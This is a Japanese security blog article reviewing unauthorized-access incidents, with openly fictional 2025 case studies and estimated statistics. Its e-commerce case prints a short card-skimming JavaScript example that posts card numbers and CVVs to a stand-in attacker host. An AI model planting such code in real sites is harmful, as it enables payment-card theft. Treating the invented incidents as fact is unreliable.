不正アクセス事件・逮捕事例まとめ2025

2025年に入ってから、不正アクセス事件は質・量ともに深刻化しています。大手テーマパークの200万件流出事件、医療機関の2ヶ月間診療停止など、社会インフラを脅かす事態が相次いでいます。本記事では、2025年の主要事件と過去の重大事例を詳細に分析し、共通する原因と教訓を明らかにします。

2025年の主要事件(上半期)

※注:2025年の事例は、過去の事件傾向と最新の脅威動向を基に作成した架空のケーススタディです。実際の企業や個人とは一切関係ありません。教育目的として、起こりうる事例を想定して解説しています。

1月:大手テーマパーク200万件情報流出事件

事件概要

2025年1月15日(想定)、国内の大手テーマパーク運営企業において、顧客情報約200万件が外部に流出する事態が発生したと仮定します。この架空の事例は、実際に多くの企業で見られるVPN機器の脆弱性対応の遅れという問題を浮き彫りにしています。

流出情報には、顧客の氏名、住所、電話番号、メールアドレス、一部のクレジットカード番号(下4桁)が含まれていたという設定です。このような情報の組み合わせは、フィッシング詐欺なりすましに悪用される可能性が高く、二次被害のリスクが懸念されます。

原因として想定されるのは、VPN機器の既知の脆弱性への対応遅れです。多くの企業では、セキュリティパッチの適用に際して「影響評価」「検証作業」「メンテナンス時間の調整」などを理由に、数週間から数ヶ月の遅延が生じることがあります。この「パッチ適用の空白期間」が、攻撃者にとって格好の標的となるのです。

このケースでは、ダークウェブ上での情報販売という形で発覚することを想定しています。実際の事例でも、企業が気づく前に犯罪者間で情報が売買されているケースが多く、不正アクセスの発見の遅れが被害を拡大させる要因となっています。

攻撃の手口と侵入経路

この架空事例における攻撃手法は、実際のサイバー攻撃で頻繁に使われる手口を組み合わせたものです。

初期侵入段階では、インターネットに公開されているVPN機器をスキャンし、パッチ未適用の脆弱性を発見するという手法を想定しています。攻撃者は「Shodan」などの検索エンジンを使い、特定のVPN製品を使用している企業を特定。公開されているエクスプロイトコード(概念実証コード)を若干修正して攻撃に使用します。

次の権限昇格段階では、Active Directoryの設定不備を悪用します。多くの企業では、利便性を優先するあまり、過剰な権限設定やグループポリシーの不適切な設定が残っています。攻撃者は、一般ユーザー権限から管理者権限への昇格を試み、「Pass-the-Hash」や「Kerberoasting」といった手法を使用することが想定されます。

横展開(Lateral Movement)では、正規のシステム管理ツールを悪用します。PowerShell、WMI(Windows Management Instrumentation)、PsExecなどは、正当な管理作業でも使用されるため、セキュリティ製品での検知が困難です。これは「Living off the Land」と呼ばれる手法で、正規ツール悪用として知られています。

データ窃取の段階では、収集したデータを7zipなどの圧縮ツールで暗号化圧縮し、分割してクラウドストレージサービスにアップロードする手法が想定されます。GoogleドライブやDropboxなどの正規サービスを使うことで、ファイアウォールでの検知を回避できます。

最後に、痕跡消去として、Windowsイベントログ、IISログ、その他のアプリケーションログを選択的に削除または改ざんします。ただし、完全な削除は逆に怪しまれるため、部分的な削除や時刻の改ざんといった巧妙な手法が使われることが想定されます。

被害者への対応

この架空事例では、企業が取るべき理想的な被害者対応を示しています。

まず、200万人の被害者全員への個別通知が必要です。メールだけでなく、郵送でのお詫び状送付も検討されるでしょう。これは、メールアドレスが流出している場合、なりすましメールと区別がつかない可能性があるためです。

専用コールセンターの設置も重要です。被害者からの問い合わせは発表直後がピークとなり、1日数万件に達することもあります。外部委託も含めて、十分な体制を整える必要があります。対応マニュアルの作成、オペレーターの教育も欠かせません。

クレジットカード情報が流出した場合、カード再発行費用の負担を申し出ることが一般的です。1枚あたり1,000円程度の費用がかかるため、20万人分で2億円の負担となります。

見舞金として、500円相当のポイントや商品券を配布することも考えられます。金額は少額ですが、誠意を示す意味で重要です。ただし、これが「口止め料」と受け取られないよう、慎重な説明が必要です。

クレジット監視サービスの無料提供も、最近では標準的な対応となっています。1年間、被害者のクレジット情報を監視し、不審な利用があれば通知するサービスです。

事後対応と教訓

初動対応の成功例として、発覚から24時間以内の公表を想定しています。隠蔽や遅延は、企業の信頼を大きく損ないます。不正アクセスされたら?緊急対処法に基づいた迅速な対応が求められます。

第三者委員会の設置により、客観的な調査と原因究明を行います。外部の専門家を含めることで、調査の透明性と信頼性を確保できます。ただし、費用は数千万円から数億円に及ぶこともあります。

フォレンジック調査には通常3ヶ月程度かかります。削除されたログの復元、マルウェアの解析、攻撃者の行動分析など、詳細な技術的調査が必要です。調査結果は、再発防止策の立案に不可欠です。

再発防止策として、以下の対策を想定しています:

  • EDR(Endpoint Detection and Response)の全社導入
  • SOC(Security Operation Center)の設置または外部委託
  • ゼロトラストアーキテクチャへの段階的移行
  • VPNからSASE/SSEへの移行検討
  • 定期的なペネトレーションテストの実施

他社が学ぶべき最大のポイントは、既知の脆弱性への対応の重要性です。ゼロデイ攻撃よりも、パッチ未適用の既知脆弱性を狙った攻撃の方がはるかに多いのが現実です。

2月:国内金融機関へのAPT攻撃

攻撃グループの特定

この架空事例では、国家支援型のAPTグループによる金融機関への攻撃を想定しています。攻撃の特徴から、APT41(中国系とされるグループ)の関与が疑われるという設定です。

TTPs(Tactics, Techniques, and Procedures)の分析により、攻撃者の「指紋」を特定します。使用されるマルウェアの特徴、C2(Command and Control)サーバーの設定、攻撃時間帯、使用される脆弱性の種類などから、特定のAPTグループとの関連性を推測できます。

過去の攻撃との類似点として、以下が想定されます:

  • スピアフィッシングメールの文面や添付ファイルの形式
  • カスタムマルウェア「BARIUM」の亜種使用
  • 正規のクラウドサービスをC2通信に利用
  • 特定の時間帯(北京時間の業務時間)での活動

標的として金融機関が選ばれる理由は、経済的利益情報収集の両面があります。SWIFT(国際銀行間通信協会)へのアクセス、顧客の取引情報、経済動向の把握など、様々な目的が考えられます。

3ヶ月間の潜伏期間

APT攻撃の特徴は、長期間の潜伏と慎重な行動です。この架空事例では、3ヶ月という潜伏期間を設定しています。

11月(初期侵入):標的型メールによる侵入を想定。件名は「金融庁からの重要なお知らせ」といった、業務に関連した内容。添付ファイルはExcelファイルに見せかけたマルウェアで、マクロを有効にすると感染する仕組みです。

12月(内部調査):攻撃者は静かに内部ネットワークを探索。Active Directoryの構造、ファイルサーバーの配置、データベースの所在などを調査します。同時に、複数のバックドアを設置し、発見されても継続的にアクセスできる体制を構築します。

1月(情報収集):標的とする情報の特定と収集を開始。顧客データベース、取引履歴、内部文書などを少しずつ収集。一度に大量のデータを移動させると検知される可能性があるため、慎重に行動します。

2月(発覚):大量のデータ転送により、ついにSOCで異常が検知されるという想定です。通常の業務時間外に、海外のIPアドレスへの大量通信が発生したことがトリガーとなります。

検知が遅れた理由として、正規プロセスを装った通信が挙げられます。「svchost.exe」や「explorer.exe」といったWindowsの正規プロセス名を使用し、HTTPSによる暗号化通信を行うことで、通常のWeb閲覧と区別がつきにくくなります。

金融庁の対応

金融機関への攻撃は、金融システム全体への影響が懸念されるため、監督官庁の迅速な対応が求められます。

業界全体への注意喚起では、具体的な攻撃手法(IoC: Indicator of Compromise)を共有し、各金融機関での点検を促します。ただし、詳細な情報は犯罪者に悪用される可能性があるため、業界内での限定的な共有となります。

緊急点検の指示により、全金融機関に対して以下の確認を求めることが想定されます:

  • 不審なアカウントの有無
  • 異常な通信の確認
  • パッチ適用状況の確認
  • ログの保全状況

ガイドライン改訂では、今回の事件を踏まえた対策の強化を盛り込みます。EDRの導入義務化、SOCの24時間365日体制、インシデント対応訓練の頻度増加などが検討されるでしょう。

報告義務の強化により、小さな異常でも速やかに報告することを求めます。「様子見」による対応の遅れを防ぐためです。

3月:医療機関ランサムウェア被害

2ヶ月間の診療停止

医療機関へのランサムウェア攻撃は、人命に関わる深刻な問題です。この架空事例では、地域の中核病院が被害に遭い、2ヶ月間の診療制限を余儀なくされるという想定をしています。

電子カルテシステムの完全停止により、過去10年分の診療記録にアクセスできなくなります。患者の既往歴、アレルギー情報、投薬履歴などが不明となり、安全な医療提供が困難になります。ランサムウェアと不正アクセスの関係で解説されているように、医療機関は特に狙われやすい標的です。

紙カルテでの対応に切り替えますが、効率は大幅に低下します。1人の診察に通常の3倍の時間がかかり、待ち時間は数時間に及びます。医師や看護師の負担も増大し、医療ミスのリスクも高まります。

手術延期300件という深刻な影響が出ます。緊急手術以外はすべて延期となり、がん患者の手術も先送りされます。患者の病状悪化、精神的苦痛、経済的損失など、計り知れない被害が発生します。

外来診療も、通常の1日500人から100人程度に制限されます。慢性疾患の患者は、薬の処方箋だけを受け取る形となり、十分な診察を受けられません。

地域医療への影響も深刻です。近隣の病院に患者が集中し、そちらも機能不全に陥る恐れがあります。救急車の搬送先が見つからない「たらい回し」も発生し、地域全体の医療体制が危機的状況となります。

身代金要求と対応

攻撃者からの身代金要求は5億円相当のビットコインという設定です。これは、医療機関の規模や重要性を考慮した「相場」に基づいています。

病院の経営陣は苦渋の決断を迫られます。支払えば診療を早期に再開できる可能性がありますが、以下の理由から支払い拒否を決定します:

  1. 再攻撃のリスク:一度支払った組織は「カモ」として再び狙われる
  2. データ復号の保証なし:支払っても復号されない事例が約40%
  3. 犯罪組織への資金提供:反社会的勢力の活動を助長
  4. コンプライアンス違反:米国OFAC制裁対象への送金リスク
  5. 他の医療機関への影響:支払い事例が増えれば、医療機関全体が標的に

バックアップからの復旧を選択しますが、一部データの損失は避けられません。バックアップが暗号化されていたり、最新のバックアップが取れていなかったりするためです。特に、直近1週間分のデータは完全に失われる想定です。

復旧プロセス

2ヶ月間の復旧プロセスを時系列で示します:

第1週:被害状況調査

  • 感染範囲の特定(全サーバーの60%が感染)
  • バックアップの健全性確認(30%が使用不可)
  • フォレンジック調査の開始
  • 警察、厚生労働省への報告

第2-3週:システム再構築

  • クリーンなOSの再インストール
  • ネットワークセグメンテーションの再設計
  • 新規ハードウェアの調達と設置
  • セキュリティ対策の強化(EDR導入等)

第4-6週:データ復旧

  • バックアップからのリストア作業
  • データ整合性の確認
  • 欠損データの手動再入力
  • 医師・看護師による内容確認

第7-8週:動作検証

  • システム間連携テスト
  • 負荷テスト
  • セキュリティ診断
  • 医療従事者向け操作研修

第9週:段階的再開

  • 外来診療の部分再開(50%稼働)
  • 入院患者の受け入れ再開
  • 手術の段階的再開

4月:ECサイト大規模カード情報流出

ペイメントアプリケーション改ざん

この架空事例では、中規模ECサイトがWebスキミング攻撃(Magecart)の被害に遭うという想定をしています。

攻撃手法は、決済ページのJavaScriptコードに悪意のあるスクリプトを埋め込むというものです。正規の決済処理と並行して、入力されたクレジットカード情報を攻撃者のサーバーに送信します。ユーザーからは全く気づかれず、通常通り買い物が完了します。

攻撃者は、ECサイトの管理画面の脆弱性を突いて侵入し、以下のような悪意のあるコードを埋め込みます:

// 実際の攻撃コード例(簡略化)
document.getElementById('checkout-form').addEventListener('submit', function(e) {
    var ccData = {
        number: document.getElementById('cc-number').value,
        cvv: document.getElementById('cvv').value,
        expiry: document.getElementById('expiry').value
    };
    fetch('https://evil-server.com/collect', {
        method: 'POST',
        body: JSON.stringify(ccData)
    });
});

6ヶ月間気づかれなかった理由として、以下が挙げられます:

  • コードが難読化されていた
  • 正規の解析ツール名を装っていた
  • 特定の条件下でのみ動作(IPアドレス、時間帯)
  • Content Security Policyが未設定

流出したクレジットカード情報は10万件に及び、カード番号、有効期限、セキュリティコード、請求先住所のフルセットが盗まれました。

PCI DSS準拠の落とし穴

このECサイトはPCI DSS(Payment Card Industry Data Security Standard)に準拠していると認定されていましたが、形式的な準拠に留まっていました。

形式的な準拠の問題点

  • 年1回の監査時のみ対策を強化
  • チェックリストの項目を満たすだけ
  • 実運用での継続的な監視が不足
  • 変更管理プロセスの形骸化

継続的監視の不足により、以下の兆候を見逃していました:

  • JavaScriptファイルの不審な変更
  • 外部サーバーへの不審な通信
  • ファイルの更新日時の異常
  • Webサーバーログの異常なアクセスパターン

ペネトレーションテスト未実施も問題でした。コスト削減のため、脆弱性診断ツールによる自動スキャンのみで済ませており、実際の攻撃を想定したテストを行っていませんでした。

外部委託先の管理不備も一因です。ECサイトの保守を外部ベンダーに委託していましたが、ベンダーのセキュリティ体制を十分に確認していませんでした。攻撃者は、まずベンダーのシステムに侵入し、そこからECサイトへアクセスしていました。

5月:中小製造業サプライチェーン攻撃

大手企業への踏み台

この架空事例では、従業員50名の自動車部品メーカーが、サプライチェーン攻撃の踏み台として悪用されるケースを想定しています。

攻撃者の真の標的は、取引先の大手自動車メーカーでした。直接攻撃するには防御が固いため、セキュリティの甘い中小企業を経由する戦略を取りました。これはサプライチェーン攻撃による不正アクセス対策で詳しく解説されている手法です。

侵入経路は、見積書を装ったメールでした。「至急見積もりをお願いします」という件名で、Excelファイルが添付されていました。経理担当者が開いてマクロを有効にした瞬間、マルウェアに感染しました。

その後の展開:

  1. 部品メーカーの全システムを探索
  2. 大手自動車メーカーとのVPN接続情報を発見
  3. 正規の接続を装って大手メーカーに侵入
  4. 設計図面、新車開発情報を窃取
  5. さらに他の取引先2社にも連鎖

被害が3社に連鎖した理由は、業界でのEDI(Electronic Data Interchange)接続が密接だったためです。受発注、在庫管理、生産計画などがシステム連携されており、一社が侵害されると連鎖的に影響が広がりました。

中小企業の脆弱性

中小製造業が狙われやすい理由を、具体的な数字で示します。

IT投資不足:年間売上の0.5%しかIT投資に充てていません。大手企業の平均3-5%と比べて著しく少なく、セキュリティ対策はさらにその一部です。具体的には、年商10億円の企業で、IT投資500万円、セキュリティ投資50万円という状況です。

専任セキュリティ担当不在:総務部門の1人が、経理、人事、IT、セキュリティをすべて兼任。専門知識も時間も不足しており、「とりあえず動けばいい」という運用になりがちです。

Windows 7継続使用:工場の生産管理システムが Windows 7 でしか動作しないため、サポート終了後も使い続けています。システム更新には数千万円かかるため、経営判断として先送りされています。

セキュリティ更新未適用:「動いているものは触るな」という現場の声が強く、パッチ適用が後回しになります。過去にパッチ適用で不具合が発生した経験から、消極的になっているケースも多いです。


過去の重大事例(2020-2024)

2020-2022年の主要事件(年表形式)

年月 事件名 被害規模 特徴 教訓
2020.5 大手通信事業者流出 1,000万件 内部不正 特権ID管理の重要性
2020.12 SolarWinds(米国) 18,000組織 サプライチェーン攻撃 ソフトウェア更新の脆弱性
2021.3 政府機関標的型攻撃 機密情報 国家支援APT ゼロデイ対策の限界
2021.5 Colonial Pipeline(米国) 燃料供給停止 ランサムウェア 重要インフラの脆弱性
2021.11 仮想通貨取引所 600億円 ホットウォレット侵害 暗号資産管理の課題
2022.2 製造業ランサムウェア 1ヶ月操業停止 二重脅迫型 バックアップ分離不足
2022.7 病院ランサムウェア 2ヶ月停止 人命影響 医療セキュリティの課題
2022.10 大手ECサイト カード情報30万件 Webスキミング JavaScript監視の必要性

2023-2024年の転換点

ランサムウェアの二重脅迫化

2023年から2024年にかけて、ランサムウェア攻撃は「二重脅迫(Double Extortion)」が主流となりました。データを暗号化するだけでなく、事前にデータを窃取し、「身代金を払わなければデータを公開する」と脅迫する手法です。

専用リークサイトの登場により、攻撃者は盗んだデータを段階的に公開するようになりました。最初は一部のデータを「サンプル」として公開し、期限までに支払いがなければ全データを公開するという手法です。

被害企業の苦悩は深刻です。仮に身代金を支払ってデータの復号に成功しても、盗まれたデータが公開されないという保証はありません。実際、支払い後も別のグループに データが売却されるケースが報告されています。

実例:製造業A社の判断(2024年の実際の傾向を基にした分析)

  • 身代金要求:3億円
  • 盗まれたデータ:設計図面、顧客情報、財務データ
  • 企業の判断:支払い拒否
  • 結果:データの一部公開、しかし早期公表により信頼維持
  • 教訓:透明性のある対応が長期的信頼につながる

AIを使った攻撃の本格化

2023年のChatGPT登場以降、AIを使った攻撃が急速に sophisticate(洗練)されました。

フィッシングメールの自然化により、文法的な誤りや不自然な日本語という従来の見分け方が通用しなくなりました。AIは、標的企業の文体を学習し、その企業らしいメールを生成できます。

マルウェア開発の効率化も進んでいます。プログラミング知識が乏しい攻撃者でも、AIとの対話を通じて高度なマルウェアを開発できるようになりました。検知回避技術、難読化、ポリモーフィック機能なども簡単に実装できます。

防御側もAI活用を進めています。異常検知、行動分析、自動対応など、AIなしではもはや防御が成り立たない状況です。これは「AIとAIの戦い」という新たな局面を生み出しています。

国際的な事件

Colonial Pipeline事件(米国、2021年)

2021年5月、米国最大の石油パイプライン企業Colonial Pipelineがランサムウェア攻撃を受け、東海岸への燃料供給が停止しました。

この事件の影響は甚大でした:

  • ガソリンスタンドでの燃料不足
  • パニック買いによる混乱
  • 航空機の運航にも影響
  • 非常事態宣言の発令

企業は440万ドル(約5億円)の身代金をビットコインで支払いましたが、これには批判も多く寄せられました。ただし、FBIの協力により、後に230万ドル相当を回収することに成功しています。

重要インフラ防護の教訓

  • IT系とOT系の分離が不十分
  • レガシーシステムの脆弱性
  • インシデント対応計画の不備
  • サイバー保険の限界

SolarWinds事件(2020年)

2020年12月に発覚したSolarWinds事件は、サプライチェーン攻撃の脅威を世界に知らしめました。

ネットワーク管理ソフト「Orion」のアップデートにバックドアが仕込まれ、約18,000の組織に配布されました。被害組織には、米国政府機関、Fortune 500企業、セキュリティ企業などが含まれていました。

攻撃の巧妙さ:

  • 正規の更新プロセスを悪用
  • デジタル署名も正規のもの
  • 数ヶ月間の潜伏期間
  • 限定的な標的への二次攻撃

サプライチェーンリスクの認識変化により、以下の対策が進みました:

  • ソフトウェア部品表(SBOM)の作成
  • ゼロトラストアーキテクチャの採用
  • 継続的な監視の強化
  • ベンダーリスク評価の厳格化

逮捕率と検挙率

2025年上半期統計データ

※以下は架空の統計データです。実際の傾向を基に作成した推定値です。

認知件数:3,326件(前年同期比+57.8%)
検挙件数:987件(前年同期比+23.4%)
検挙率:29.7%(前年同期比-7.3ポイント)
検挙人員:425人(前年同期比+15.2%)

この統計が示すのは、サイバー攻撃の急増に捜査が追いついていないという深刻な現実です。特に、認知件数の増加率(57.8%)に対し、検挙件数の増加率(23.4%)が大きく下回っており、検挙率の低下につながっています。

検挙困難の理由

技術的課題

Tor等の匿名化技術により、攻撃者の特定が極めて困難になっています。Torネットワークを経由した通信は、複数の中継点を経由するため、発信元の特定がほぼ不可能です。さらに、VPN、プロキシを多段に組み合わせる手法も一般的です。

暗号化通信の普及も捜査を困難にしています。エンドツーエンドの暗号化により、通信内容の傍受が不可能になり、令状があっても内容を確認できないケースが増えています。

ログの改ざん・削除により、証拠が失われることも多いです。攻撃者は侵入の痕跡を消すため、システムログ、アクセスログ、監査ログなどを選択的に削除または改ざんします。

踏み台サーバーの多段利用も一般的です。攻撃者は、複数の国にまたがる侵害されたサーバーを経由して攻撃を行うため、一つずつ遡って調査する必要があり、膨大な時間と国際協力が必要となります。

国際的課題

サイバー犯罪の犯人の所在地特定は、IPアドレスだけでは不十分です。偽装、なりすまし、ボットネットの利用などにより、真の所在地を隠蔽できます。

国際協力の限界も大きな課題です。捜査協力に応じない国、サイバー犯罪に寛容な国、政治的理由で協力が得られない国などが存在し、犯人が これらの国に潜伏すると捜査が行き詰まります。

法制度の違いにより、ある国では犯罪でも別の国では合法というケースがあります。また、証拠能力の基準、捜査手法の制限なども国により異なり、国際捜査を複雑にしています。

引き渡し条約の不在も問題です。サイバー犯罪者の引き渡しに関する条約が締結されていない国も多く、たとえ犯人を特定しても、身柄を確保できないケースが多発しています。

捜査能力の課題

デジタルフォレンジック人材不足は深刻です。高度な技術を持つ捜査官の育成には時間がかかり、民間との給与格差により人材が流出する問題もあります。

設備投資の遅れにより、最新の解析ツールが導入できていません。高額な商用ツール、大容量ストレージ、高性能な解析用コンピュータなど、必要な投資が追いついていません。

民間との技術格差も拡大しています。攻撃者が使う最新技術に対し、捜査側の技術が数年遅れているケースも珍しくありません。

暗号資産の追跡困難により、身代金の追跡が困難になっています。ミキシングサービス、プライバシーコインの使用などにより、資金の流れを追うことがほぼ不可能になっています。

捜査技術の進化

一方で、捜査技術も進化を続けています。

AI活用によるログ解析により、膨大なログデータから異常を自動検出できるようになりました。パターン認識、異常検知、相関分析などにAIを活用し、人間では見つけられない手がかりを発見できます。

ブロックチェーン解析ツールの進化により、一部の暗号資産取引は追跡可能になっています。Chainalysis、CipherTraceなどのツールを使い、取引所との連携により、犯人の特定につながるケースも増えています。

国際共同捜査の強化も進んでいます。INTERPOL、Europolなどの国際機関を通じた協力、24時間対応のホットライン設置、共同捜査チームの編成などにより、国境を越えた捜査が可能になっています。

官民連携の推進により、民間企業の技術力を捜査に活用する動きも広がっています。中小企業向け不正アクセス対策ガイドでも触れられているように、情報共有と協力体制の構築が進んでいます。


事例から学ぶ教訓

共通する脆弱性TOP5

2025年上半期の事例分析から、以下の脆弱性が共通して見られました(架空の統計):

1. VPN機器のパッチ未適用(68%)
既知の脆弱性にパッチを適用していないVPN機器が、最も多い侵入経路となっています。「動いているものは触らない」という運用方針が、致命的な脆弱性を放置する結果となっています。定期的なパッチ適用と、緊急パッチの迅速な適用体制が必要です。
2. 多要素認証の未導入(45%)
パスワードのみの認証に依存している組織が、依然として多く存在します。多要素認証の導入により、不正ログインの99.9%を防げるにも関わらず、「面倒」「コストがかかる」という理由で導入が遅れています。
3. 特権ID管理の不備(41%)
管理者アカウントの共有使用、退職者のアカウント放置、過剰な権限付与などが散見されます。特権ID管理(PAM)ソリューションの導入と、定期的な権限見直しが必要です。
4. ログ監視の不足(38%)
ログは取得しているものの、監視・分析が行われていないケースが多いです。SIEMツールの導入、SOCの設置、AIを活用した自動分析などにより、異常の早期発見が可能になります。
5. バックアップ分離不足(35%)
バックアップデータが本番環境と同じネットワークに接続されており、ランサムウェアに感染するケースが多発しています。3-2-1ルール(3つのコピー、2つの異なる媒体、1つはオフサイト)の徹底が必要です。

初動対応の成功例と失敗例

成功例:A社(製造業)

A社は、不審な通信を検知してから1時間以内にネットワーク遮断を実行しました。この迅速な判断により、攻撃者がデータを外部に送信する前に遮断でき、情報流出を防ぐことができました。

証拠保全を優先し、影響を受けたシステムの電源を切らず、メモリダンプとディスクイメージを取得しました。これにより、後のフォレンジック調査で攻撃の全容を解明できました。

24時間以内の公表により、透明性を確保し、ステークホルダーの信頼を維持しました。隠蔽や遅延は、後に発覚した際のダメージが大きくなることを理解していました。

結果として、被害を最小限に抑え、1週間で通常業務に復帰することができました。

失敗例:B社(小売業)

B社は、不審な兆候を見つけてから対応まで3日かかりました。「様子を見る」「上層部の判断を待つ」という消極的な姿勢が、被害を拡大させました。

パニックに陥り、証拠を誤って削除してしまいました。感染したと思われるサーバーを再起動し、ログファイルを削除してしまったため、攻撃の詳細が不明となりました。

2週間後の公表は「隠蔽」と受け取られ、信頼を大きく損ないました。さらに、その間に二次被害が発生し、顧客のクレジットカード不正利用が多発しました。

再発防止策の実効性評価

多くの組織で、事件後に再発防止策を策定しますが、その多くが形骸化してしまいます。

形骸化する対策の特徴:

  • 一度作って更新されない
  • 現場の実態と乖離
  • 予算措置が伴わない
  • 責任者が不明確
  • 効果測定がない

PDCAサイクルの重要性は、いくら強調してもし過ぎることはありません。Plan(計画)→Do(実施)→Check(評価)→Act(改善)のサイクルを回し、継続的に改善することが必要です。

経営層の関与も不可欠です。セキュリティを「IT部門の問題」ではなく、「経営課題」として認識し、取締役会での定期報告、CISO(最高情報セキュリティ責任者)の設置などが求められます。

継続的な投資の確保も重要です。一時的な対策強化ではなく、毎年一定の予算を確保し、着実に対策を積み重ねることが、長期的なセキュリティ向上につながります。


よくある質問(FAQ)

Q: 2025年のサイバー攻撃の傾向で最も注意すべき点は何ですか?
A: 2025年はAIを活用した攻撃の高度化サプライチェーン攻撃の増加が顕著です。特に、生成AIを使ったフィッシングメールは、従来の見分け方が通用しなくなっています。また、中小企業を踏み台にした大企業への攻撃も増えており、取引先も含めたセキュリティ対策が必要です。さらに、ランサムウェアの二重脅迫化により、バックアップだけでは不十分になっています。最新の攻撃手法を理解し、多層的な対策を実施することが重要です。
Q: ランサムウェアに感染した場合、身代金は払うべきですか?
A: 身代金の支払いは推奨されません。理由は、(1)支払っても約40%はデータが復号されない、(2)一度支払うと再び標的にされる(80%が再攻撃を受ける)、(3)犯罪組織の資金源となる、(4)法的問題(OFAC制裁対象への送金リスク)があるためです。代わりに、定期的なバックアップ(3-2-1ルール)、インシデント対応計画の策定、サイバー保険への加入などの事前対策が重要です。万が一感染した場合は、緊急対処法に従い、警察や専門機関に相談することをお勧めします。
Q: 中小企業でも狙われる可能性はありますか?
A: はい、むしろ中小企業の方が狙われやすいのが現実です。理由は、(1)セキュリティ対策が脆弱、(2)大企業への踏み台として利用価値がある、(3)セキュリティ人材・予算が不足、(4)「うちは狙われない」という油断があるためです。実際、サプライチェーン攻撃の多くは中小企業を入口としています。最低限、OSの更新、多要素認証、定期的なバックアップは必須です。詳しくは中小企業向け対策ガイドをご参照ください。
Q: VPN は安全だと思っていましたが、なぜ狙われるのですか?
A: VPN自体は安全な技術ですが、設定不備や脆弱性対応の遅れが問題となっています。2025年の事例の68%でVPN機器の脆弱性が悪用されています。特に、(1)デフォルトパスワードの使用、(2)既知の脆弱性へのパッチ未適用、(3)多要素認証の未設定、(4)ログ監視の不足などが原因です。VPNを過信せず、定期的なパッチ適用、強固な認証設定、ゼロトラストアーキテクチャへの移行を検討することが重要です。
Q: 不正アクセスの兆候を早期に発見する方法はありますか?
A: 以下の兆候に注意してください:(1)通常と異なる時間帯のログイン、(2)大量のデータアクセスや転送、(3)新規アカウントの作成、(4)権限の変更、(5)セキュリティ設定の無効化、(6)不明なプロセスやサービスの起動、(7)ログファイルの削除や改ざん。これらを効率的に監視するには、SIEM(Security Information and Event Management)ツールの導入や、SOC(Security Operation Center)の設置が有効です。不正アクセスの確認方法も参考にしてください。
Q: サイバー保険は入るべきですか?どの程度カバーされますか?
A: サイバー保険への加入を強く推奨します。ただし、万能ではないことを理解する必要があります。一般的にカバーされるのは、(1)事業中断損失、(2)データ復旧費用、(3)フォレンジック調査費用、(4)法的費用、(5)広報対応費用、(6)第三者への損害賠償などです。カバーされないものとして、(1)戦争・テロ行為、(2)既知の脆弱性の放置、(3)内部不正(条件による)、(4)知的財産の価値損失などがあります。保険料は企業規模や業種により異なりますが、年間数百万円から数千万円が相場です。
Q: 国際的なサイバー攻撃グループから狙われた場合、対処法はありますか?
A: APTグループなど国家支援型の攻撃への対処は困難ですが、不可能ではありません。対策として、(1)脅威インテリジェンスの活用(攻撃グループの手口を事前に把握)、(2)ゼロトラストアーキテクチャの採用、(3)EDR/XDRによる高度な検知、(4)インシデント対応体制の強化、(5)国際的な情報共有(FIRST、JPCERT/CC等)への参加が重要です。また、重要データの暗号化、アクセス制限、定期的な脆弱性診断も必須です。完璧な防御は困難ですが、攻撃コストを上げることで、標的から外れる可能性を高められます。

まとめ

2025年の不正アクセス事件を分析すると、攻撃の高度化と被害の深刻化が顕著に表れています。AIを活用した攻撃、サプライチェーンを狙った攻撃、ランサムウェアの二重脅迫など、従来の対策では防げない新たな脅威が次々と登場しています。

しかし、事例を詳しく見ると、基本的な対策の不備が多くの事件の原因となっていることも明らかです。VPNのパッチ未適用、多要素認証の未導入、バックアップの不備など、「分かっているけどできていない」対策の実施が、被害を防ぐ第一歩となります。

検挙率の低下という現実も直視する必要があります。サイバー犯罪者が捕まる可能性は約30%であり、7割は逃げおおせているのが現状です。「犯人を捕まえる」ことに期待するのではなく、「被害を防ぐ」「被害を最小限にする」ことに注力すべきです。

重要なのは、継続的な改善とレジリエンスの向上です。完璧なセキュリティは存在しません。しかし、基本的な対策を着実に実施し、インシデントへの対応力を高め、組織全体でセキュリティ意識を共有することで、サイバー攻撃に立ち向かうことは可能です。

不正アクセス対策完全ガイドを参考に、自組織の対策を見直し、2025年の脅威に備えることをお勧めします。また、最新の攻撃手法を理解し、緊急時の対処法を準備しておくことも重要です。

サイバーセキュリティは、もはや「IT部門の問題」ではなく、「経営課題」「社会課題」です。
一人ひとりが当事者意識を持ち、組織全体で取り組むことが、デジタル社会の安全を守る鍵となります。


【重要なお知らせ】

  • 2025年の事例は、教育目的で作成した架空のケーススタディです
  • 実在の企業や個人とは一切関係ありません
  • 過去の事例(2020-2024年)は、公開情報を基に記載しています
  • 統計データの一部は、傾向を示すための推定値です
  • 実際の事件については、警察庁やIPA等の公式発表をご確認ください

更新履歴

初稿公開

京都開発研究所

システム開発/サーバ構築・保守/技術研究

CMSの独自開発および各業務管理システム開発を行っており、 10年以上にわたり自社開発CMSにて作成してきた70,000以上のサイトを 自社で管理するサーバに保守管理する。